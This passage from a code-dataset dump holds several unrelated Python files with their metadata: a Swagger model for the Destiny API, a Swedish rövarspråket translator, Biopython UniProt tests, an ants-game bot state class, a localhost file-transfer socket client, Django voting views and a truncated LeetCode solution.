defined in Swagger\"\"\" # noqa: E501\n\n self._preview_vendor_hash = None\n self._preview_action_string = None\n self._derived_item_categories = None\n self.discriminator = None\n\n if preview_vendor_hash is not None:\n self.preview_vendor_hash = preview_vendor_hash\n if preview_action_string is not None:\n self.preview_action_string = preview_action_string\n if derived_item_categories is not None:\n self.derived_item_categories = derived_item_categories\n\n @property\n def preview_vendor_hash(self):\n \"\"\"Gets the preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n\n If the preview data is derived from a fake \\\"Preview\\\" Vendor, this will be the hash identifier for the DestinyVendorDefinition of that fake vendor. # noqa: E501\n\n :return: The preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :rtype: int\n \"\"\"\n return self._preview_vendor_hash\n\n @preview_vendor_hash.setter\n def preview_vendor_hash(self, preview_vendor_hash):\n \"\"\"Sets the preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition.\n\n If the preview data is derived from a fake \\\"Preview\\\" Vendor, this will be the hash identifier for the DestinyVendorDefinition of that fake vendor. # noqa: E501\n\n :param preview_vendor_hash: The preview_vendor_hash of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :type: int\n \"\"\"\n\n self._preview_vendor_hash = preview_vendor_hash\n\n @property\n def preview_action_string(self):\n \"\"\"Gets the preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n\n If the preview has an associated action (like \\\"Open\\\"), this will be the localized string for that action. # noqa: E501\n\n :return: The preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. 
# noqa: E501\n :rtype: str\n \"\"\"\n return self._preview_action_string\n\n @preview_action_string.setter\n def preview_action_string(self, preview_action_string):\n \"\"\"Sets the preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition.\n\n If the preview has an associated action (like \\\"Open\\\"), this will be the localized string for that action. # noqa: E501\n\n :param preview_action_string: The preview_action_string of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :type: str\n \"\"\"\n\n self._preview_action_string = preview_action_string\n\n @property\n def derived_item_categories(self):\n \"\"\"Gets the derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n\n This is a list of the items being previewed, categorized in the same way as they are in the preview UI. # noqa: E501\n\n :return: The derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :rtype: list[DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition]\n \"\"\"\n return self._derived_item_categories\n\n @derived_item_categories.setter\n def derived_item_categories(self, derived_item_categories):\n \"\"\"Sets the derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition.\n\n This is a list of the items being previewed, categorized in the same way as they are in the preview UI. # noqa: E501\n\n :param derived_item_categories: The derived_item_categories of this DestinyDefinitionsDestinyItemPreviewBlockDefinition. # noqa: E501\n :type: list[DestinyDefinitionsItemsDestinyDerivedItemCategoryDefinition]\n \"\"\"\n\n self._derived_item_categories = derived_item_categories\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, DestinyDefinitionsDestinyItemPreviewBlockDefinition):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"python/swagger_client/models/destiny_definitions_destiny_item_preview_block_definition.py","file_name":"destiny_definitions_destiny_item_preview_block_definition.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"375562626","text":"from gtts import gTTS\r\n\r\nimport os\r\n\r\n# Alla vokaler\r\nvowels = 'aouåeiyäö'\r\n\r\n# Mina frågor ligger i dictionarys\r\nquestion = [('Vill du kryptera eller dekryptera(K eller D)?\\n', 'k', 'd')]\r\nquestion2 = [('Vill du få det uppläst, ja eller nej(J eller N)?\\n', 'j', 'n')]\r\n\r\n# Här får man välja om man vill ha till 
eller från rövarspråket och vad man vill översätta\r\ndef main() -> None:\r\n    for i in question:\r\n        answer = str(input(i[0]))\r\n        if answer.lower() == i[1]:\r\n            word = input('Vad vill du översätta?\\n')\r\n            final_word = rövarspråket(word)\r\n            print(final_word)\r\n            text_to_speech(final_word)\r\n        elif answer.lower() == i[2]:\r\n            word = input('Vad vill du översätta?\\n')\r\n            final_word = decode_rövarspråket(word)\r\n            print(final_word)\r\n            text_to_speech(final_word)\r\n        else:\r\n            print('404 error')\r\n\r\n# Kollar om bokstaven är en vokal\r\ndef is_vowel(letter: str) -> bool:\r\n    return letter.lower() in vowels\r\n\r\n# Gör om svenska till rövarspråket\r\ndef rövarspråket(text: str) -> str:\r\n    translation = ''\r\n    for letter in text:\r\n        if letter in 'qwrtpsdfghjklzxcvbnmQWRTPSDFGHJKLZXCVBNM':\r\n            translation = translation + letter + 'o' + letter\r\n        else:\r\n            translation = translation + letter\r\n    return translation\r\n\r\n# Gör om rövarspråket till svenska\r\ndef decode_rövarspråket(word: str) -> str:\r\n    original_word = []\r\n    i = 0\r\n    while i <= (len(word) - 1):\r\n        character = word[i]\r\n        original_word.append(character)\r\n        if character.isalpha() and not is_vowel(character):\r\n            i += 3\r\n        else:\r\n            i += 1\r\n    return ''.join(original_word)\r\n\r\n# Läser upp det som är översatt\r\ndef text_to_speech(text):\r\n    for i in question2:\r\n        answer = str(input(i[0]))\r\n        if answer.lower() == i[1]:\r\n            language = 'sv'\r\n            # Buggfix: parametern heter text (variabeln phrase fanns inte)\r\n            myobj = gTTS(text=text, lang=language, slow=False)\r\n            myobj.save(\"rövarspråket.mp3\")\r\n            os.system(\"rövarspråket.mp3\")\r\n        elif answer.lower() == i[2]:\r\n            print(text)\r\n        else:\r\n            print('404 error')\r\n\r\nif __name__ == '__main__':\r\n    main()","sub_path":"003rövarspråket_encrypt_decrypt.py","file_name":"003rövarspråket_encrypt_decrypt.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"485444781","text":"#!/usr/bin/env python\n\"\"\"Test for the Uniprot parser on Uniprot XML files.\n\"\"\"\nimport os\nimport copy\nimport unittest\n\nfrom Bio import SeqIO\nfrom Bio.SeqRecord import SeqRecord\n\n#Left as None if the import within UniProtIO fails\nif SeqIO.UniprotIO.ElementTree is None:\n    from Bio import MissingPythonDependencyError\n    raise MissingPythonDependencyError(\"No ElementTree module was found. 
\"\n \"Use Python 2.5+, lxml or elementtree if you \"\n \"want to use Bio.SeqIO.UniprotIO.\")\n\nfrom seq_tests_common import compare_reference, compare_record\n\nclass TestUniprot(unittest.TestCase):\n\n def test_uni001(self):\n \"Parsing Uniprot file uni001\"\n filename = 'uni001'\n # test the record parser\n\n datafile = os.path.join('SwissProt', filename)\n\n test_handle = open(datafile)\n seq_record = SeqIO.read(test_handle, \"uniprot-xml\")\n test_handle.close()\n\n self.assertTrue(isinstance(seq_record, SeqRecord))\n\n # test a couple of things on the record -- this is not exhaustive\n self.assertEqual(seq_record.id, \"Q91G55\")\n self.assertEqual(seq_record.name, \"043L_IIV6\")\n self.assertEqual(seq_record.description, \"Uncharacterized protein 043L\")\n self.assertEqual(repr(seq_record.seq), \"Seq('MDLINNKLNIEIQKFCLDLEKKYNINYNNLIDLWFNKESTERLIKCEVNLENKI...IPI', ProteinAlphabet())\")\n\n # self.assertEqual(seq_record.accessions, ['Q91G55']) #seq_record.accessions does not exist\n # self.assertEqual(seq_record.organism_classification, ['Eukaryota', 'Metazoa', 'Chordata', 'Craniata', 'Vertebrata', 'Mammalia', 'Eutheria', 'Primates', 'Catarrhini', 'Hominidae', 'Homo'])\n # self.assertEqual(record.seqinfo, (348, 39676, '75818910'))\n \n self.assertEqual(len(seq_record.features), 1) \n self.assertEqual(repr(seq_record.features[0]), \"SeqFeature(FeatureLocation(ExactPosition(0), ExactPosition(116)), type='chain', id='PRO_0000377969')\")\n\n self.assertEqual(len(seq_record.annotations['references']), 2)\n self.assertEqual(seq_record.annotations['references'][0].authors, 'Jakob N.J., Mueller K., Bahr U., Darai G.')\n self.assertEqual(seq_record.annotations['references'][0].title, 'Analysis of the first complete DNA sequence of an invertebrate iridovirus: coding strategy of the genome of Chilo iridescent virus.')\n self.assertEqual(seq_record.annotations['references'][0].journal, 'Virology 286:182-196(2001)')\n self.assertEqual(seq_record.annotations['references'][0].comment, 'journal article | 2001 | Scope: NUCLEOTIDE SEQUENCE [LARGE SCALE GENOMIC DNA] | ')\n\n self.assertEqual(len(seq_record.dbxrefs), 11)\n self.assertEqual(seq_record.dbxrefs[0], 'DOI:10.1006/viro.2001.0963')\n\n self.assertEqual(seq_record.annotations['sequence_length'], 116)\n self.assertEqual(seq_record.annotations['sequence_checksum'], '4A29B35FB716523C')\n self.assertEqual(seq_record.annotations['modified'], '2009-07-07')\n self.assertEqual(seq_record.annotations['accessions'], ['Q91G55'])\n self.assertEqual(seq_record.annotations['taxonomy'], ['Viruses', 'dsDNA viruses, no RNA stage', 'Iridoviridae', 'Iridovirus'])\n self.assertEqual(seq_record.annotations['sequence_mass'], 13673)\n self.assertEqual(seq_record.annotations['dataset'], 'Swiss-Prot')\n self.assertEqual(seq_record.annotations['gene_name_ORF'], ['IIV6-043L'])\n self.assertEqual(seq_record.annotations['version'], 21)\n self.assertEqual(seq_record.annotations['sequence_modified'], '2001-12-01')\n self.assertEqual(seq_record.annotations['keywords'], ['Complete proteome', 'Virus reference strain'])\n self.assertEqual(seq_record.annotations['organism_host'], ['Acheta domesticus', 'House cricket', 'Chilo suppressalis', 'striped riceborer', 'Gryllus bimaculatus', 'Two-spotted cricket', 'Gryllus campestris', 'Spodoptera frugiperda', 'Fall armyworm'])\n self.assertEqual(seq_record.annotations['created'], '2009-06-16')\n self.assertEqual(seq_record.annotations['organism_name'], ['Chilo iridescent virus'])\n self.assertEqual(seq_record.annotations['organism'], 
'Invertebrate iridescent virus 6 (IIV-6)')\n self.assertEqual(seq_record.annotations['recommendedName_fullName'], ['Uncharacterized protein 043L'])\n self.assertEqual(seq_record.annotations['sequence_version'], 1)\n self.assertEqual(seq_record.annotations['proteinExistence'], ['Predicted'])\n\n def compare_txt_xml(self, old, new):\n self.assertEqual(old.id, new.id)\n self.assertEqual(old.name, new.name)\n self.assertEqual(len(old), len(new))\n self.assertEqual(str(old.seq), str(new.seq))\n for key in set(old.annotations).intersection(new.annotations):\n if key == \"references\":\n self.assertEqual(len(old.annotations[key]),\n len(new.annotations[key]))\n for r1, r2 in zip(old.annotations[key], new.annotations[key]):\n #Tweak for line breaks in plain text SwissProt\n r1.title = r1.title.replace(\"- \", \"-\")\n r2.title = r2.title.replace(\"- \", \"-\")\n r1.journal = r1.journal.rstrip(\".\") #Should parser do this?\n r1.medline_id = \"\" #Missing in UniPort MXL? TODO - check\n #Lots of extra comments in UniProt XML\n r1.comment = \"\"\n r2.comment = \"\"\n if not r2.journal: r1.journal = \"\"\n compare_reference(r1, r2)\n elif old.annotations[key] == new.annotations[key]:\n pass\n elif key in [\"date\"]:\n #TODO - Why is this a list vs str?\n pass\n elif type(old.annotations[key]) != type(new.annotations[key]):\n raise TypeError(\"%s gives %s vs %s\" % \\\n (key, old.annotations[key], new.annotations[key]))\n elif key in [\"organism\"]:\n if old.annotations[key] == new.annotations[key]:\n pass\n elif old.annotations[key].startswith(new.annotations[key]+\" \"):\n pass\n else:\n raise ValueError(key)\n elif isinstance(old.annotations[key], list) \\\n and sorted(old.annotations[key]) == sorted(new.annotations[key]):\n pass\n else:\n raise ValueError(\"%s gives %s vs %s\" % \\\n (key, old.annotations[key], new.annotations[key]))\n self.assertEqual(len(old.features), len(new.features),\n \"Features in %s, %i vs %i\" %\n (old.id, len(old.features), len(new.features)))\n for f1, f2 in zip(old.features, new.features):\n \"\"\"\n self.assertEqual(f1.location.nofuzzy_start, f2.location.nofuzzy_start,\n \"%s %s vs %s %s\" %\n (f1.location, f1.type, f2.location, f2.type))\n self.assertEqual(f1.location.nofuzzy_end, f2.location.nofuzzy_end,\n \"%s %s vs %s %s\" %\n (f1.location, f1.type, f2.location, f2.type))\n \"\"\"\n self.assertEqual(repr(f1.location), repr(f2.location),\n \"%s %s vs %s %s\" %\n (f1.location, f1.type, f2.location, f2.type))\n\n def test_Q13639(self):\n \"\"\"Compare SwissProt text and uniprot XML versions of Q13639.\"\"\"\n old = SeqIO.read(\"SwissProt/Q13639.txt\", \"swiss\")\n new = SeqIO.read(\"SwissProt/Q13639.xml\", \"uniprot-xml\")\n self.compare_txt_xml(old, new)\n \n def test_multi_ex(self):\n \"\"\"Compare SwissProt text and uniprot XML versions of several examples.\"\"\"\n txt_list = list(SeqIO.parse(\"SwissProt/multi_ex.txt\", \"swiss\"))\n xml_list = list(SeqIO.parse(\"SwissProt/multi_ex.xml\", \"uniprot-xml\"))\n fas_list = list(SeqIO.parse(\"SwissProt/multi_ex.fasta\", \"fasta\"))\n ids = [x.strip() for x in open(\"SwissProt/multi_ex.list\")]\n self.assertEqual(len(txt_list), len(ids))\n self.assertEqual(len(txt_list), len(fas_list))\n self.assertEqual(len(txt_list), len(xml_list))\n for txt, xml, fas, id in zip(txt_list, xml_list, fas_list, ids):\n self.assertEqual(txt.id, id)\n self.assertTrue(txt.id in fas.id.split(\"|\"))\n self.assertEqual(str(txt.seq), str(fas.seq))\n self.compare_txt_xml(txt, xml)\n \n def test_multi_ex_index(self):\n \"\"\"Index SwissProt text 
and uniprot XML versions of several examples.\"\"\"\n txt_list = list(SeqIO.parse(\"SwissProt/multi_ex.txt\", \"swiss\"))\n xml_list = list(SeqIO.parse(\"SwissProt/multi_ex.xml\", \"uniprot-xml\"))\n ids = [x.strip() for x in open(\"SwissProt/multi_ex.list\")]\n txt_index = SeqIO.index(\"SwissProt/multi_ex.txt\", \"swiss\")\n xml_index = SeqIO.index(\"SwissProt/multi_ex.xml\", \"uniprot-xml\")\n self.assertEqual(sorted(txt_index), sorted(ids))\n self.assertEqual(sorted(xml_index), sorted(ids))\n #Check SeqIO.parse() versus SeqIO.index() for plain text \"swiss\"\n for old in txt_list:\n new = txt_index[old.id]\n compare_record(old, new)\n #Check SeqIO.parse() versus SeqIO.index() for XML \"uniprot-xml\"\n for old in xml_list:\n new = xml_index[old.id]\n compare_record(old, new)\n \nif __name__ == \"__main__\":\n runner = unittest.TextTestRunner(verbosity = 2)\n unittest.main(testRunner=runner)\n","sub_path":"Tests/test_Uniprot.py","file_name":"test_Uniprot.py","file_ext":"py","file_size_in_byte":9688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"409463325","text":"#!/usr/bin/env python\nfrom ants import *\nfrom bucket import *\n\n# A class that stores most of the game infomation\nclass game_state():\n # Setup the class\n\tdef __init__(self, ants, logger):\n\t\t# Setup share variables\n\t\tself.ants = ants\n\t\tself.logger = logger\n\t\tself.turn = 0\t\n\t\t\n\t\t# Setup my ant variables\n\t\tself.my_ants = set()\n\t\tself.movable = set()\n\t\tself.num_my_ants = 0\t\t\n\t\tself.remove_ant = set()\n\t\tself.my_hills = set()\n\t\t\n\t\t# Setup enemy ant variables\n\t\tself.enemy_ants = [set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set()]\n\t\tself.enemy_hills = [set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set(), set()]\n\t\tself.num_enemy_ants = 0\n\t\t\n\t\t# Setup path variables\n\t\tself.paths = []\n\t\t\n\t\t# Setup food variables\n\t\tself.food = set()\n\t\tself.targets = set()\n\t\t\n\t\t# Setup bucket map \n\t\tself.size = 8\n\t\tself.bucket_rows = int(self.ants.rows / self.size)\n\t\tself.bucket_cols = int(self.ants.cols / self.size)\n\n\t\tself.bucket_map = [ [ bucket(self.size) ] * (self.bucket_rows + 1) for i in range(self.bucket_cols + 1)]\n\t\t\n\t\t# Empty the buckets\n\t\tfor col in range(self.bucket_cols):\n\t\t\tfor row in range(self.bucket_rows):\n\t\t\t\tself.bucket_map[col][row] = bucket(self.size)\n\t\t\n\t# Update the bucket map\n\tdef update_bucket(self):\n\t\t# Empty the buckets\n\t\tfor col in range(self.bucket_cols):\n\t\t\tfor row in range(self.bucket_rows):\n\t\t\t\tself.bucket_map[col][row].reset()\n\t\t\t\t\n\t\t# Update my ants\n\t\tfor ant_loc in self.my_ants:\n\t\t\trow, col = ant_loc\n\t\t\tcol = int(col / self.size)\n\t\t\trow = int(row / self.size)\n\t\t\tself.bucket_map[col][row].my_ants.add(ant_loc)\n\t\t\t\n\t\t# Update enemy ants\n\t\tfor ant_loc in self.enemy_ants[0]:\n\t\t\trow, col = ant_loc\n\t\t\tcol = int(col / self.size)\n\t\t\trow = int(row / self.size)\n\t\t\tself.bucket_map[col][row].enemy_ants.add(ant_loc)\n\t\t\t\n\t\t# Update food\n\t\tfor food_loc in self.food:\n\t\t\trow, col = food_loc\n\t\t\tcol = int(col / self.size)\n\t\t\trow = int(row / self.size)\n\t\t\tself.bucket_map[col][row].food.add(food_loc)\n\t\t\n\t\t#self.logger.debug(\"Mini map cols: %d rows: %d\", self.bucket_cols, self.bucket_rows) \n\t\t#self.logger.debug(\"my density map:\\n%s\", self.render_my_density())\n\t\t#self.logger.debug(\"enemy density 
map:\\n%s\", self.render_enemy_density())\n\t\t#self.logger.debug(\"food density:\\n%s\", self.render_food_density())\n\t\t\n\t# Do the start up collection of data\n\tdef start_turn(self):\n\t\t# Increment turn number\n\t\tself.turn = self.turn + 1\n\t\t\n\t\t# Update my current info\n\t\tself.my_ants = set(self.ants.my_ants())\n\t\tself.movable = self.my_ants.copy()\n\t\tself.num_my_ants = len(self.my_ants)\n\t\tself.my_hills = set(self.ants.my_hills())\n\t\tself.remove_ant.clear()\n\t\t\n\t\t# Update enemy ant info\n\t\tenemy_ants = self.ants.enemy_ants()\n\t\tenemy_hills = self.ants.enemy_hills()\n\t\tself.num_enemy_ants = 0\n\t\t\n\t\t# Clear enemy ants\n\t\tfor ant_set in self.enemy_ants:\n\t\t\tant_set.clear()\n\t\t\t\n\t\t# Clear hills by testing if old hills are visible\n\t\tremove_hills = set()\n\t\tfor index in range(len(self.enemy_hills)):\n\t\t\tremove_hills.clear()\n\t\t\tfor hill in self.enemy_hills[index]:\n\t\t\t\n\t\t\t\t# If the hill is visible test if it still exist\n\t\t\t\tif self.ants.visible(hill):\n\t\t\t\t\n\t\t\t\t\t# Look for the hill in the updated list\n\t\t\t\t\tfound = False\n\t\t\t\t\tfor loc, owner in enemy_hills:\n\t\t\t\t\t\tif loc == hill:\n\t\t\t\t\t\t\tfound = True\n\t\t\t\t\t\t\t\n\t\t\t\t\t# If the hill doesn't exist then the hill has been razed\n\t\t\t\t\tif not found:\n\t\t\t\t\t\tremove_hills.add(hill)\n\t\t\t# Update the hill list\n\t\t\tif remove_hills:\n\t\t\t\t#self.logger.debug(\"remove_hills list%s\", remove_hills)\n\t\t\t\tself.enemy_hills[index] = self.enemy_hills[index] - remove_hills\n\t\t\n\t\tfor loc, owner in enemy_ants:\n\t\t\tself.num_enemy_ants += 1\n\t\t\tself.enemy_ants[owner].add(loc)\n\t\t\tself.enemy_ants[0].add(loc)\n\t\t\n\t\tfor loc, owner in enemy_hills:\n\t\t\tself.enemy_hills[owner].add(loc)\n\t\t\tself.enemy_hills[0].add(loc)\n\t\t\n\t\t# Update the food info\n\t\tself.food = set(self.ants.food())\n\t\tself.targets.clear()\n\t\t\n\t\t# Log turn stats\n\t\t#self.logger.debug(\"----------------------------Do Turn %d----------------------------\", self.turn)\n\t\t#self.logger.debug(\"ant food %s\", self.food)\n\t\t#self.logger.debug(\"my ants (%d): %s\", self.num_my_ants, self.my_ants)\n\t\t#self.logger.debug(\"enemy ants (%d): %s\", self.num_enemy_ants, self.enemy_ants)\n\t\t#self.logger.debug(\"my hills: %s\", self.my_hills)\n\t\t#self.logger.debug(\"enemy hills: %s\", self.enemy_hills)\n\t\t#self.logger.debug(\"map:\\n%s\", self.ants.render_text_map())\n\t\t#self.logger.debug(\"path map:\\n%s\", self.render_paths())\n\t\t\n\t\tself.update_bucket()\n\t\t\n\t# Render a text map of the paths\n\tdef render_paths(self):\n\t\t#Start with an empty\n\t\tpath_map = [ ['.'] * self.ants.rows for i in range(self.ants.cols)]\n\t\ttext_map = ''\n\t\t\n\t\t# Go through each path and each node\n\t\tx0 = y0 = x1 = y1 = 0\n\t\tfor current in self.paths:\n\t\t\tfor i in range(len(current.path)):\n\t\t\t\tif i == 0:\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\t# Get the path delta\n\t\t\t\ty0, x0 = current.path[i-1]\n\t\t\t\ty1, x1 = current.path[i]\n\t\t\t\tdx = x0 - x1\n\t\t\t\tdy = y0 - y1\n\n\t\t\t\t# Draw the direction the path is going\n\t\t\t\tif dx == 0:\n\t\t\t\t\tif dy == -1 or dy > 1:\n\t\t\t\t\t\tpath_map[x0][y0] = 'v'\n\t\t\t\t\tif dy == 1 or dy < -1:\n\t\t\t\t\t\tpath_map[x0][y0] = '^'\n\t\t\t\telse:\n\t\t\t\t\tif dx == -1 or dx > 1:\n\t\t\t\t\t\tpath_map[x0][y0] = '>'\n\t\t\t\t\tif dx == 1 or dx < -1:\n\t\t\t\t\t\tpath_map[x0][y0] = '<'\n\t\t\t\n\t\t\t# X Marks the spot\n\t\t\tif not i == 0:\n\t\t\t\tpath_map[x1][y1] = 
'X'\n\n\t\t# Render the map\n\t\tfor x in range(self.ants.rows):\n\t\t\tfor y in range(self.ants.cols):\n\t\t\t\ttext_map += path_map[y][x]\n\t\t\ttext_map += '\\n'\n\t\t\n\t\treturn text_map\n\t\t\n\t# Render a text map of my ant density\n\tdef render_my_density(self):\n\t\t# Render the map\n\t\ttext_map = ''\n\t\t\n\t\tfor y in range(self.bucket_rows):\n\t\t\tfor x in range(self.bucket_cols):\n\t\t\t\tdense = self.bucket_map[x][y].my_density()\n\t\t\t\tif dense < 0.01:\n\t\t\t\t\ttext_map += '.'\n\t\t\t\telif dense < 0.1:\n\t\t\t\t\ttext_map += 'o'\n\t\t\t\telif dense < 0.3:\n\t\t\t\t\ttext_map += 'O'\n\t\t\t\telif dense < 0.6:\n\t\t\t\t\ttext_map += '@'\n\t\t\t\telse:\n\t\t\t\t\ttext_map += '#'\n\t\t\ttext_map += '\\n'\n\t\t\t\n\t\treturn text_map\n\t\t\n\t# Render a text map of enemy ant density\n\tdef render_enemy_density(self):\n\t\t# Render the map\n\t\ttext_map = ''\n\t\tfor y in range(self.bucket_rows):\n\t\t\tfor x in range(self.bucket_cols):\n\t\t\t\tdense = self.bucket_map[x][y].enemy_density()\n\t\t\t\tif dense < 0.01:\n\t\t\t\t\ttext_map += '.'\n\t\t\t\telif dense < 0.1:\n\t\t\t\t\ttext_map += 'o'\n\t\t\t\telif dense < 0.3:\n\t\t\t\t\ttext_map += 'O'\n\t\t\t\telif dense < 0.6:\n\t\t\t\t\ttext_map += '@'\n\t\t\t\telse:\n\t\t\t\t\ttext_map += '#'\n\t\t\ttext_map += '\\n'\n\t\t\t\n\t\treturn text_map\n\t\t\n\t# Render a text map of food density\n\tdef render_food_density(self):\n\t\t# Render the map\n\t\ttext_map = ''\n\t\tfor y in range(self.bucket_rows):\n\t\t\tfor x in range(self.bucket_cols):\n\t\t\t\tdense = self.bucket_map[x][y].food_density()\n\t\t\t\tif dense < 0.01:\n\t\t\t\t\ttext_map += '.'\n\t\t\t\telif dense < 0.1:\n\t\t\t\t\ttext_map += 'o'\n\t\t\t\telif dense < 0.3:\n\t\t\t\t\ttext_map += 'O'\n\t\t\t\telif dense < 0.6:\n\t\t\t\t\ttext_map += '@'\n\t\t\t\telse:\n\t\t\t\t\ttext_map += '#'\n\t\t\ttext_map += '\\n'\n\t\t\t\n\t\treturn text_map\n","sub_path":"mybotV4/game_state.py","file_name":"game_state.py","file_ext":"py","file_size_in_byte":6853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"415482771","text":"#!/usr/bin/env python\nimport socket\nimport hashlib\n\n\nHOST = 'localhost'\nPORT = 10000\n\n\ndef echo_client():\n    ''' Client side of the echo server '''\n\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((HOST, PORT))\n\n    while True:\n        # Read user input to send to the server\n        data = input('input > ')\n\n        # Exit condition\n        if data == 'exit':\n            break\n\n        # Send the data to the server\n        s.sendall(data.encode())\n\n        # Receive the server's reply\n        data = s.recv(1024)\n        if not data:\n            break\n        else:\n            print(data.decode('utf-8'))\n\n    s.close()\n\ndef recv_file():\n    '''\n    Receive a file from the server\n    :return:\n    '''\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((HOST, PORT))\n    while True:\n        cmd = input(\">>:\").strip()\n        if len(cmd) == 0: continue\n        if cmd.startswith(\"exit\"):\n            break\n        if cmd.startswith(\"get\"):\n            s.send(cmd.encode())\n            # Receive the file size\n            server_response = s.recv(1024)\n            print(server_response.decode())\n            if server_response.decode() == '文件不存在':\n                continue\n            else:\n                print(\"文件大小:\", server_response.decode())\n\n            # Send an acknowledgement\n            s.send(b\"ok\")\n\n            file_size = int(server_response.decode())\n            received_size = 0\n            filename = cmd.split()[1]\n            f = open(filename + \".new\", \"wb\")\n            m = hashlib.md5()\n            # received_data = b\"\"\n            while received_size < file_size:\n                # Only request as many bytes as remain in the file\n                if file_size - received_size > 1024:\n                    buff = 1024\n                else:\n                    buff = file_size - received_size\n                # Receive one chunk of data\n                cmd_res = s.recv(buff)\n                # Track how many bytes have been received so far\n                received_size = received_size + len(cmd_res)\n\n                m.update(cmd_res)\n                # Write the received data to the file\n                f.write(cmd_res)\n            else:\n                print(\"done\")\n                f.close()\n                new_file_md5 = m.hexdigest()\n\n                server_file_md5 = s.recv(1024)\n                print(\"server md5 is :\", server_file_md5)\n                print(\"client md5 is :\", new_file_md5)\n    s.close()\n\n\nif __name__ == '__main__':\n    # echo_client()\n    recv_file()","sub_path":"week02/echo_client.py","file_name":"echo_client.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"469580624","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom django.utils.translation import get_language\n\nimport django_browserid.views\nimport waffle\n\nfrom flicks.base import regions\nfrom flicks.base.util import redirect\nfrom flicks.users.forms import UserProfileForm\nfrom flicks.users.tasks import newsletter_subscribe\nfrom flicks.videos.models import Video, Vote\n\n\n@login_required\ndef profile(request):\n    \"\"\"Display and process the profile creation form.\"\"\"\n    form = UserProfileForm(request.POST or None)\n    if request.method == 'POST' and form.is_valid():\n        profile = form.save(commit=False)\n        profile.user = request.user\n        profile.locale = get_language()\n        profile.save()\n\n        if form.cleaned_data['mailing_list_signup']:\n            format = form.cleaned_data['mailing_list_format']\n            newsletter_subscribe.delay(request.user.email,\n                                       source_url=request.build_absolute_uri(),\n                                       format=format)\n\n        return redirect('flicks.videos.upload')\n\n    return render(request, 'users/profile.html', {\n        'form': form,\n        'regions': regions,\n    })\n\n\nclass Verify(django_browserid.views.Verify):\n    def login_success(self, *args, **kwargs):\n        \"\"\"\n        Extend successful login to check if the user was attempting to vote for\n        a video, and create the vote if they were.\n        \"\"\"\n        response = super(Verify, self).login_success(*args, **kwargs)\n        if not waffle.flag_is_active(self.request, 'voting'):\n            return response\n\n        try:\n            video_id = self.request.session['vote_video']\n            video = Video.objects.get(id=video_id)\n            Vote.objects.get_or_create(user=self.request.user, video=video)\n            del self.request.session['vote_video']\n\n            # Set cookie so the JavaScript knows they successfully voted.\n            response.set_cookie('just_voted', '1', max_age=3600, httponly=False)\n        except (Video.DoesNotExist, ValueError):\n            # Avoid retrying on an invalid video.\n            del self.request.session['vote_video']\n        except KeyError:\n            pass  # Do nothing if the key never existed.\n\n        return response\n\n    def login_failure(self, *args, **kwargs):\n        \"\"\"\n        Extend login failure so that if login fails, the user's attempts to\n        vote for a video are cancelled.\n        \"\"\"\n        try:\n            del self.request.session['vote_video']\n        except KeyError:\n            pass\n\n        return super(Verify, self).login_failure(*args, **kwargs)\n","sub_path":"flicks/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
{"seq_id":"343643535","text":"class Solution(object):\n    def removeElement(self, nums, val):\n        rm_index = []\n        for i in xrange(len(nums)):\n            if nums[i] == val:\n                rm_index.append(i)\n        last = len(nums) - 1\n        for i in rm_index:\n            while last >= 0 and nums[last] == val:\n                last -= 1\n            if last < 0:\n                break\n            nums[i] = nums[last]\n            last -= 1\n        return len(nums) - 
